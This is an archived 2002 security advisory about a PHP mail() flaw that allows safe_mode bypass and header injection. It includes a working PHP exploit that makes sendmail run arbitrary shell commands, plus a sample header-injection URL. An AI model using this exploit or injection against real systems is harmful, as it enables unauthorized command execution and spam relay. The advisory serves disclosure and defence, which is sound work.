TUCoPS :: Web :: PHP :: web5650.htm

PHP arbitrary commands execution
21th Aug 2002 [SBWID-5650]
COMMAND

	
		PHP arbitrary commands execution
	
	

SYSTEMS AFFECTED

	
		versions earlier than 4.1.0
	
	

PROBLEM

	
		In Red Hat Security advisory [RHSA-2002:102-26] :
		

		--snipp--
		

		PHP is an HTML-embedded scripting language commonly  used  with  Apache.
		PHP versions 4.0.5 through 4.1.0 in safe mode do  not  properly  cleanse
		the 5th parameter to the  mail()  function.  This  vulnerability  allows
		local users and possibly remote attackers to execute arbitrary  commands
		via shell metacharacters.
		

		--snapp--
		

		Wojciech   Purczynski    [cliph@isec.pl]    iSEC    Security    Research
		[http://isec.pl/] comments on :
		

		 (1) Bypassing safe_mode restriction

		

		If PHP is configured with safe_mode option enabled, special  restriction
		are set up including limit on external binaries  that  may  be  executed
		from within a PHP script.
		

		The 5th argument to the mail() function (introduced  in  version  4.0.5)
		allow specifying command line option to the sendmail binary.  Some  time
		ago a bug was found in  the  mail()  function  allowing  to  pass  shell
		meta-characters in the 5th argument, leading to execute arbitrary  shell
		commands or external binaries. This bug was fixed in version 4.1.0.
		

		However, mail() function is still vulnerable because it allows  to  pass
		command line arguments to the sendmail binary which  gives  the  ability
		to influence its behavior (i.e. by  using  non-default  aliases,  custom
		configuration files - other cases are possible with others MTAs)
		

		Passing 5th  argument  should  be  disabled  if  PHP  is  configured  in
		safe_mode.
		

		Exploit attached at the end.
		

		 (2) Injecting ASCII control characters into mail() arguments

		

		Arbitrary  ASCII  control  characters  may  be  injected   into   string
		arguments of mail()  function.  If  mail()  arguments  are  takeon  from
		user's input it may give the  user  ability  to  alter  message  content
		including mail headers.
		

		Example of such a vulnerability may be found on PHP.net site:
		

		

		http://www.php.net/mailing-lists.php?maillist=your@email.com%0a&email=fake@from.net%0a

		

		PHP should do content filtering before creating message body  sent  with
		"sendmail -t" command.
		

		

		 Impact:

		 =======

		

		 (1) Any user may bypass safe_mode restrictions if mail() function is not

		     disabled.

		 (2) Open-relay PHP script if user's data is poorly or not filtered and 

		     passed to the mail() function.

		

		

		 Exploit:

		 ========

		

		Sample exploit for (1) that works with sendmail MTA:
		

		- -----8<----- bypass_safe_mode.php -----8<-----

		<?

		$script=tempnam("/tmp", "script");

		$cf=tempnam("/tmp", "cf");

		

		$fd = fopen($cf, "w");

		fwrite($fd, "OQ/tmp

		Sparse=0

		R$*" . chr(9) . "$#local $@ $1 $: $1

		Mlocal, P=/bin/sh, A=sh $script");

		fclose($fd);

		

		$fd = fopen($script, "w");

		fwrite($fd, "rm -f $script $cf; ");

		fwrite($fd, $cmd);

		fclose($fd);

		

		mail("nobody", "", "", "", "-C$cf");

		?>

		- -----8<----- bypass_safe_mode.php -----8<-----

		

		
	
	

SOLUTION

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH